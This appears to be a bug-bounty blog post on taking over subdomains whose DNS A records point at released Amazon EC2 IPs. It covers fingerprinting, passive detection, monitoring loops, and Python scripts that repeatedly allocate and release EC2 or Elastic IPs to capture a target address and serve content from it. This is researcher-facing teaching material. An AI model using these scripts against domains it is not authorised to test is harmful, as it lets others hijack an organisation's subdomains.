Dangling DNS: Amazon EC2 IPs (Current State)
Inspired by Matt Bryant's research on AWS dangling domains in 2015, I revisited the research and applied the technique to bug bounty programs during my bug bounty journey.

  • Shortly after writing my last blog post, I kept getting messages about creating a Proof of Concept (PoC) for this kind of issue, and I thought that I had covered most of the cases, but it turned out I was wrong. So in this post, I'll break down the technical details of this issue from a bug hunter's perspective and then work on automating the process so that bug hunters can apply it at scale.
  • The IP address 3.5.140.229 will be used as an example during this blog post.
  • Most of the scripts are written in Python or Bash.

Let's start with how EC2-based subdomain takeover differs from common subdomain takeover issues (if subdomain takeover is a new term for you, I recommend Patrik Hudak's blog).
In a standard subdomain takeover, we hunt CNAME, MX, or NS records, while in an EC2-based subdomain takeover, we hunt A records.

So how do we detect whether a subdomain is EC2-based? There are three possible ways to fingerprint it:
  1. The subdomain has a CNAME record which matches one of the following regexes (a small Python check is sketched below, after the Nuclei template):
Python
r'ec2-[-\d]+\.compute[-\d]*\.amazonaws\.com'
r'ec2-[-\d]+\.[\w\d\-]+\.compute[-\d]*\.amazonaws\.com'
If you are a fan of Nuclei templates like me, I have built a template for fingerprinting EC2-based subdomains using CNAME records:
YAML
ec2-based-detection.yaml
id: ec2-based-detector

info:
  name: amazon ec2-based subdomain detection
  author: melbadry9
  severity: info
  tags: dns

dns:
  - name: "{{FQDN}}"
    type: CNAME
    class: inet
    recursion: true
    retries: 2
    matchers:
      - type: regex
        regex:
          - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com"
          - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com"
  2. The subdomain has an A record, and a reverse IP lookup returns a hostname which matches the previous regexes. We can use the host command to perform the reverse lookup, or use Python:
Bash
host 3.5.140.229
Python
reverse_lookup.py
from dns import resolver, reversename  # pip3 install dnspython
addr = reversename.from_address("3.5.140.229")
hostname = str(resolver.query(addr, "PTR")[0])
print(hostname)
  3. The subdomain has an A record which falls within an Amazon IP range (ip_prefix), which can be found here.
The tools I have used to automate this step are anew, httpie, and mapcidr, to generate a file which contains all possible Amazon IPs and then check whether the IP is in that file (a pure-Python alternative is sketched after the Go tool below).
Bash
http https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] | .ip_prefix' -r | mapcidr -silent -o aws_ec2_ips.txt
grep "3.5.140.229" aws_ec2_ips.txt || echo "Not EC2-Based"
I found this code that checks a list of IPs against a list of CIDRs and prints out IPs which fall within the range.
recloud/check_range.go at master · 0x3c3e/recloud
go run check_range.go -ip_file /path/to/ips_file -network_file /path/to/cidr_file
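Alternatively, instead of expanding every CIDR into a file, a short Python sketch using only the standard library can check an address directly against the published prefixes (same ip-ranges.json as above; the function name is mine):
Python
import ipaddress
import json
import urllib.request

# download the published AWS IP ranges
URL = "https://ip-ranges.amazonaws.com/ip-ranges.json"
with urllib.request.urlopen(URL) as resp:
    PREFIXES = json.load(resp)["prefixes"]

def is_aws_ip(ip: str) -> bool:
    # check whether the address falls inside any published AWS prefix
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(p["ip_prefix"]) for p in PREFIXES)

print(is_aws_ip("3.5.140.229"))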
At this point, we have identified the subdomains and IPs which are EC2-based. Let's check for issues.
After completing the fingerprinting phase, we found a subdomain that is EC2-based. Now what?
JSON
DNS Record For EC2-Based subdomain
{
  "host": "sub.example.com",
  "resolver": [
    "8.8.8.8:53"
  ],
  "a": [
    "3.5.140.229"
  ],
  "cname": [
    "ec2-3-5-140-229.ap-southeast-1.compute.amazonaws.com"
  ],
  "status_code": "NOERROR"
}
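If you are not using a DNS tool that emits this kind of JSON, a rough Python sketch with dnspython (the helper name is mine) can gather similar A and CNAME data:
Python
import json
from dns import resolver  # pip3 install dnspython (>= 2.0)

def dns_record(host: str) -> dict:
    # collect A and CNAME answers in a layout similar to the record above
    record = {"host": host, "a": [], "cname": []}
    for rtype in ("A", "CNAME"):
        try:
            answers = resolver.resolve(host, rtype)
        except Exception:
            continue
        record[rtype.lower()] = [str(rr).rstrip(".") for rr in answers]
    return record

print(json.dumps(dns_record("sub.example.com"), indent=2))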

Objective:
Find proof that our subdomain is currently taken over, or has been taken over in the past, by a third party.

Manual Mode
Semi-automated Mode
  • Open http://sub.example.com/ in your browser and check for:
    • Weird content which can't belong to example.com
    • Redirection to a website that doesn't belong to example.com (Location header)
    • Directories (using brute force) in case the response contains a blank HTML page
I'll be using httpx for this part to extract the title and location from the HTTP response. This tool is very efficient when checking a huge list of EC2-based subdomains, and I'll then check the results manually.
echo "sub.example.com" | httpx -title -location
httpx -title -location -l ec2_based_subdomains.txt
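If you prefer scripting the same check, a rough Python sketch (assuming the requests library; the helper name is mine) can pull the status code, Location header, and page title for a single host:
Python
import re
import requests  # pip3 install requests

def http_fingerprint(host: str) -> dict:
    # fetch the page without following redirects and extract status, Location and <title>
    resp = requests.get("http://{0}/".format(host), allow_redirects=False, timeout=10)
    title = re.search(r"<title[^>]*>(.*?)</title>", resp.text, re.I | re.S)
    return {
        "host": host,
        "status_code": resp.status_code,
        "location": resp.headers.get("Location"),
        "title": title.group(1).strip() if title else None,
    }

print(http_fingerprint("sub.example.com"))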
Frans Rosén mentioned this technique during his talk "DNS hijacking using cloud providers" in 2017.

Manual Mode
Semi-automated Mode
Monitoring Mode
  • Open https://sub.example.com/ in your browser and check for:
    • Weird content which can't belong to example.com
    • Redirection to a website that doesn't belong to example.com (Location header)
    • Directories (using brute force) in case the response contains a blank HTML page
  • Open the SSL certificate data from the browser (after the certificate warning shown by the browser) and check for:
    • An Organization name (Org) which doesn't own example.com
    • A Common Name (CN) which doesn't match or belong to example.com
    • A Subject Alternative Name (DNS Name) which doesn't match or belong to example.com
I'll be using httpx for this part to extract the dns_names and organization name from the SSL certificate. This tool is very efficient when checking a huge list of EC2-based subdomains.
echo "sub.example.com" | httpx -json | jq '.tls'
httpx -json -l ec2_based_subdomains.txt | jq '.tls'
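For a single host, a minimal Python sketch (assuming the cryptography package; the helper name is mine) can grab the certificate without validating it and print the CN, SANs, and Organization to compare against example.com:
Python
import ssl
from cryptography import x509  # pip3 install cryptography
from cryptography.x509.oid import ExtensionOID, NameOID

def cert_names(host: str, port: int = 443) -> dict:
    # fetch the certificate without validation, then parse CN, SANs and Organization
    pem = ssl.get_server_certificate((host, port))
    cert = x509.load_pem_x509_certificate(pem.encode())
    try:
        san = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        ).value.get_values_for_type(x509.DNSName)
    except x509.ExtensionNotFound:
        san = []
    return {
        "common_name": [a.value for a in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)],
        "organization": [a.value for a in cert.subject.get_attributes_for_oid(NameOID.ORGANIZATION_NAME)],
        "dns_names": san,
    }

print(cert_names("sub.example.com"))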
I'll be using SSLEnum for this part to extract the dns_names and organization name from the SSL certificate, compare them against the hostname, and print out possibly vulnerable subdomains. I'll be using notify to send notifications and anew to track new results. This technique may produce false-positive results, so confirm the SSL data before reporting.
# check the current state of the subdomains in the list and save it, to check for changes later
cat ec2_based_subdomains.txt | sslenum -t 10 | tee -a ec2_takeover.txt
# bash loop which will run forever and check for changes in the ssl certificates
while true; do
  cat ec2_based_subdomains.txt | sslenum -t 10 | jq 'select(.dangling == true)' -c | anew ec2_takeover.txt | notify
done

  • We can use passive data collected by search engines like Google, Bing, Shodan, and Spyse. I'll be using Shodan in the next part.
Manual Mode
Semi-automated Mode
  • Open https://www.shodan.io and search with the following query: net:ip1,ip2,..
  • For our target, we will use net:3.5.140.229
  • Check HTTP and SSL certificate data collected before to confirm that our subdomain was under third-party control.
To automate the search query for multiple IPs on Shodan, I use the following script to fetch the data and then analyze it manually.
shodan_ip_query.py
import json
import shodan  # pip3 install shodan

def fetch_ip_data(ip: str):
    KEY = "shodan_api_key"  # Add Shodan API key
    api = shodan.Shodan(KEY)
    results = api.search('net:{0}'.format(ip))
    # Extract http and ssl data for IP if any exists
    if results['total'] > 0:
        all_ip_data = []
        for match in results['matches']:
            ip_data = {"ip": ip}
            ip_data['ssl'] = match.get("ssl")
            ip_data['http'] = match.get("http")
            all_ip_data.append(ip_data)
        # Print out results and collected data as list
        print(json.dumps(all_ip_data, indent=4))
        return all_ip_data

fetch_ip_data("3.5.140.229")
  • We can use the Internet Archive (Wayback Machine) to collect old snapshots of our subdomain and apply the previous techniques (a quick CDX query is sketched after this list).
  • We can scan ports on our target sub.example.com and check the open ports for data that confirms the owner of the current IP.
  • We can contact the security team to inquire about ownership of the IP, but this is not possible with every company or program.
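For the Wayback Machine check, a small Python sketch against the public CDX API (endpoint and parameters as I understand them; the helper name is mine) can list archived captures of the subdomain:
Python
import json
import urllib.parse
import urllib.request

def wayback_snapshots(host: str):
    # query the Wayback Machine CDX API for archived captures of the host
    params = urllib.parse.urlencode({
        "url": host,
        "output": "json",
        "fl": "timestamp,original,statuscode",
        "collapse": "digest",
    })
    with urllib.request.urlopen("http://web.archive.org/cdx/search/cdx?" + params) as resp:
        body = resp.read().decode()
    rows = json.loads(body) if body.strip() else []
    # the first row is the field header; the captures follow
    return rows[1:]

for timestamp, original, status in wayback_snapshots("sub.example.com"):
    print(timestamp, status, original)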
Passive detection requires creativity, OSINT skills, and monitoring. The chances of a false positive are relatively high.
You can find your own method to detect vulnerable subdomains. Personally, I use the previous techniques, so feel free to suggest other techniques, and I'll add them.

Objective:
Take over the subdomain's IP and assign it to an EC2 instance network interface.
First, we should know how Amazon assigns new IPs to its customers from the IP pool, so that we can get our desired IP address 3.5.140.229.

  • Every time an EC2 instance stops and starts, Amazon will assign a new public IP address to it.
  • Amazon allows acquiring public IP addresses using Elastic IP.

This method was mentioned before in this blog post, so I wrote a quick script to take over 3.5.140.229, which falls within the region ap-southeast-1. We can take over this IP and serve our content on the EC2 server to create our PoC.
This technique has a medium probability of success and can take an enormous amount of time.
Python
ec2_bruteforce.py
import boto3  # pip3 install boto3

INST_IDs = [""]  # created ec2 instance ID
AWSSecretKey = ""  # Amazon console secret key
AWSAccessKeyId = ""  # Amazon console access key
mon_ips = ['3.5.140.229']  # IP address to take over

# connect to ec2 service with provided keys
ecc2 = boto3.client(
    'ec2',
    aws_access_key_id=AWSAccessKeyId,
    aws_secret_access_key=AWSSecretKey,
    region_name='ap-southeast-1'
)

# extract PublicIp with instance ID
def get_ip(ec2):
    ips = []
    response = ec2.describe_instances(InstanceIds=INST_IDs)
    for inst in response['Reservations']:
        for i in inst['Instances']:
            for ii in i['NetworkInterfaces']:
                ips.append(ii['Association']['PublicIp'])
    return ips

# stop ec2 with instance ID and wait until it is fully stopped
def stop_ec2(ec2):
    response = ec2.stop_instances(InstanceIds=INST_IDs, Hibernate=False, Force=True)
    ec2.get_waiter('instance_stopped').wait(InstanceIds=INST_IDs)
    print(response)

# start ec2 with instance ID and wait until it is running, so a public IP is assigned
def start_ec2(ec2):
    response = ec2.start_instances(InstanceIds=INST_IDs)
    ec2.get_waiter('instance_running').wait(InstanceIds=INST_IDs)
    print(response)

if __name__ == "__main__":
    found = False
    # start and stop the ec2 instance until we acquire the IP
    while not found:
        start_ec2(ecc2)
        if get_ip(ecc2)[0] == mon_ips[0]:
            found = True
            print("IP {0} Acquired".format(mon_ips[0]))
        else:
            stop_ec2(ecc2)
I found this repository very helpful with automating this method using a bash script and the awscli command line.

This technique is more practical and faster than the stop-start method. This method has been reported before in a HackerOne report. The following script is used to automate this process. Amazon allows up to 5 Elastic IPs for each account per region, so this script can be optimized using multi-threading.
Python
aws_ip_bruter.py
import time
import boto3  # pip3 install boto3

found = False
AWSSecretKey = ""  # Amazon console secret key
AWSAccessKeyId = ""  # Amazon console access key
mon_ips = ['3.5.140.229']  # IP address to take over

# connect to ec2 service with provided keys
ecc2 = boto3.client(
    'ec2',
    aws_access_key_id=AWSAccessKeyId,
    aws_secret_access_key=AWSSecretKey,
    region_name='ap-southeast-1'
)

# acquire an Elastic IP and release it until we get the specific IP
while not found:
    allocation = ecc2.allocate_address(Domain='vpc')
    address = allocation["PublicIp"]
    allocation_id = allocation["AllocationId"]
    if address in mon_ips:
        found = True
        print("Acquired IP {0}".format(address))
    else:
        ecc2.release_address(AllocationId=allocation_id)
        # make sure to get new addresses
        time.sleep(60)
If you have a limited budget on an Amazon account, you should probably keep an eye on the billing section for extra charges.
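To help avoid leftover charges, a quick boto3 sketch can list the Elastic IPs still allocated in the region, so any addresses left behind by the loop above can be released:
Python
import boto3  # pip3 install boto3

# uses your default AWS credentials
ec2 = boto3.client('ec2', region_name='ap-southeast-1')

# list Elastic IPs still allocated to the account; unassociated ones keep accruing charges
for addr in ec2.describe_addresses()['Addresses']:
    associated = 'AssociationId' in addr
    print(addr['PublicIp'], addr['AllocationId'], 'associated' if associated else 'NOT associated')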
I found some GitHub repositories which automate active EC2 takeover:

In this part, I'll explain how to create a PoC for an EC2-based subdomain takeover.

In this type of takeover, we don't create a traditional PoC. The only kind of PoC we attach when writing a report is the proof we found during the passive phase. If we have not found proof, we keep monitoring the subdomain for changes.

After successfully acquiring the IP address, we attach that IP to our EC2 instance, if it isn't already attached. Then we SSH into the instance and create our takeover.html PoC in the web server path /var/www/html/. Now, when we visit http://sub.example.com/takeover.html, we should see our PoC live. If you cannot access your HTTP server, ensure network access is allowed, as mentioned here.
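If the acquired Elastic IP is not yet attached to the instance, a short boto3 sketch can associate it (the instance and allocation IDs below are placeholders):
Python
import boto3  # pip3 install boto3

# uses your default AWS credentials
ec2 = boto3.client('ec2', region_name='ap-southeast-1')

# placeholder IDs: the instance we control and the Elastic IP we acquired
INSTANCE_ID = "i-0123456789abcdef0"
ALLOCATION_ID = "eipalloc-0123456789abcdef0"

# attach the acquired Elastic IP to the instance's network interface
response = ec2.associate_address(InstanceId=INSTANCE_ID, AllocationId=ALLOCATION_ID)
print(response["AssociationId"])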

At this point, you're ready to find a vulnerable EC2-Based subdomain takeover and submit a report.
If you decide to depend on a passive takeover, you should avoid managed programs, as they still tend to ask for traditional PoC files.

  • Passive Takeover: Palo Alto Software disclosed on HackerOne: DNS Misconfiguration...
  • Active Takeover: OneWeb disclosed on HackerOne: Subdomain Takeover - pmp.oneweb.net